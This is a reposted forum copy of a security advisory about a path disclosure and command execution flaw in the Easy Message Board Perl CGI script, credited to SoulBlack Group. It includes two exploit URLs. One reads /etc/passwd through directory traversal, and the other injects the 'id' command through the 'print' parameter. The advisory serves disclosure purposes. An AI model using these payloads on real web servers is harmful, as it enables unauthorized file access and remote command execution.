[转载]Easy Message Board路径泄露和命令执行漏洞
信息来源:[url]www.securiteam.com[/url]Summary
A new vulnerability was identified in Easy Message Board, which may be exploited by attackers to compromise a vulnerable web server. This flaw is due to an input validation error in the "easymsgb.pl" script where the variable print that is put under "open()", does not have a control of data, which may be exploited by a remote attacker to execute arbitrary commands with the privileges of the web server.
Credit:
The information has been provided by SoulBlack Group.
The original article can be found at: [url]http://www.soulblack.com.ar/repo/papers/easymsgb_advisory.txt[/url]
Details
Exploits:
The following URLs can be used to trigger the vulnerability:
[url]http://SITE/cgi-bin/emsgb/easymsgb.pl?print=../../../../../../../../etc/passwd[/url]
[url]http://SITE/cgi-bin/emsgb/easymsgb.pl?print=[/url]|id|
页:
[1]